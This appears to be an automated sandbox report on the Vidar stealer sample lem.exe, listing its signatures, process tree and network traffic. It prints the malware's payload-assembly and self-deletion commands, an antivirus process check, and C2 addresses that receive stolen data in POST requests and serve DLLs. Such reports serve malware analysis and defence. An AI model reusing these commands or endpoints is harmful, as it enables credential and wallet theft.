
Windows Analysis Report
lem.exe

Overview

General Information

Sample name: lem.exe
Analysis ID: 1488222
MD5: bb74165a5eb382a47e26f4efd8c2f151
SHA1: cb6f613025a9b8cf64bd90ae3813beb4e872e93f
SHA256: d3b3da570c489317ccaa129c2c66cc8765afaf20b5e4ccc24a88dd6b90e64920
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • lem.exe (PID: 5344 cmdline: "C:\Users\user\Desktop\lem.exe" MD5: BB74165A5EB382A47E26F4EFD8C2F151)
    • cmd.exe (PID: 5348 cmdline: "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2616 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6768 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6204 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4456 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1408 cmdline: cmd /c md 366791 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6760 cmdline: findstr /V "TrailersTractOffersVenezuela" Mines MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6768 cmdline: cmd /c copy /b Pending + Smith + Specifications + Resident 366791\M MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Gift.pif (PID: 748 cmdline: 366791\Gift.pif 366791\M MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • cmd.exe (PID: 3568 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2124 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6204 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
(14 entries in total)

Source | Rule | Description | Author | Strings
11.3.Gift.pif.4688da0.11.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Gift.pif.1722008.2.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.3.Gift.pif.16a2810.8.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Gift.pif.465b598.4.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.3.Gift.pif.465b598.9.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
(9 entries in total)
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: 366791\Gift.pif 366791\M, CommandLine: 366791\Gift.pif 366791\M, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\366791\Gift.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\366791\Gift.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\366791\Gift.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5348, ParentProcessName: cmd.exe, ProcessCommandLine: 366791\Gift.pif 366791\M, ProcessId: 748, ProcessName: Gift.pif

                        HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5348, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 4456, ProcessName: findstr.exe
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-08-05T18:55:53.040452+0200 | 2028765 | 49715 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:37.229200+0200 | 2028765 | 49737 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:56.073425+0200 | 2028765 | 49717 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:09.165224+0200 | 2028765 | 49725 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:48.655006+0200 | 2028765 | 49748 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:51.591528+0200 | 2028765 | 49713 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:51.563057+0200 | 2028765 | 49750 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:56.753779+0200 | 2049087 | 49717 | 443 | TCP | A Network Trojan was detected
2024-08-05T18:56:53.756676+0200 | 2054495 | 49752 | 80 | TCP | A Network Trojan was detected
2024-08-05T18:56:42.427737+0200 | 2028765 | 49742 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:35.159350+0200 | 2028765 | 49735 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:04.615928+0200 | 2028765 | 49722 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:44.328736+0200 | 2028765 | 49744 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:59.114134+0200 | 2028765 | 49719 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:47.466732+0200 | 2028765 | 49747 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:54.663227+0200 | 2028765 | 49716 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:22.171975+0200 | 2028765 | 49732 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:26.168708+0200 | 2028765 | 49734 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:39.235253+0200 | 2028765 | 49739 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:19.713700+0200 | 2028765 | 49730 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:46.372825+0200 | 2028765 | 49746 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:52.926886+0200 | 2028765 | 49751 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:38.198914+0200 | 2028765 | 49738 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:58.307206+0200 | 2051831 | 443 | 49718 | TCP | Malware Command and Control Activity Detected
2024-08-05T18:56:13.087106+0200 | 2028765 | 49727 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:11.170074+0200 | 2028765 | 49726 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:36.234067+0200 | 2028765 | 49736 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:55.352655+0200 | 2049087 | 49716 | 443 | TCP | A Network Trojan was detected
2024-08-05T18:56:40.332124+0200 | 2028765 | 49740 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:43.444404+0200 | 2028765 | 49743 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:57.620373+0200 | 2028765 | 49718 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:05.840854+0200 | 2028765 | 49723 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:41.322529+0200 | 2028765 | 49741 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:03.317760+0200 | 2028765 | 49721 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:20.793047+0200 | 2028765 | 49731 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:23.785268+0200 | 2028765 | 49733 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:07.183514+0200 | 2028765 | 49724 | 443 | TCP | Unknown Traffic
2024-08-05T18:55:56.754342+0200 | 2044247 | 443 | 49717 | TCP | Malware Command and Control Activity Detected
2024-08-05T18:56:45.398883+0200 | 2028765 | 49745 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:14.802464+0200 | 2028765 | 49728 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:16.411777+0200 | 2028765 | 49729 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:49.549343+0200 | 2028765 | 49749 | 443 | TCP | Unknown Traffic
2024-08-05T18:56:00.308967+0200 | 2028765 | 49720 | 443 | TCP | Unknown Traffic


                        AV Detection

Source: https://steamcommunity.com/profiles/76561199747278259/badges | Avira URL Cloud: Label: malware
Source: https://t.me/armad2a | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259 | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/inventory/ | Avira URL Cloud: Label: malware
Source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
Source: lem.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: lem.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.245.87.202:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: lem.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: nss3.pdb@ source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: cryptosetup.pdbGCTL source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: cryptosetup.pdb source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: softokn3.pdb@ source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Gift.pif, 0000000B.00000002.3238395117.000000002B17C000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Gift.pif, 0000000B.00000002.3232561588.000000001F29A000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00334005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00334005
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0033494A
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0033C2FF
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033CD14 FindFirstFileW,FindClose,11_2_0033CD14
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0033CD9F
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0033F5D8
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0033F735
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0033FA36
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00333CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00333CE2
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                        Networking

Source: Malware configuration extractor | URLs: http://www.microsoft.com0
Source: global traffic | HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.102.49.249 104.102.49.249
Source: Joe Sandbox View | IP Address: 38.180.132.96 38.180.132.96
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 6425 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /sqls.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 188.245.87.202 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFHIIDHJEBFBFIDAKFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 7009Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 6985Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 188.245.87.202Content-Length: 32481Connection: Keep-AliveCache-Control: no-cache
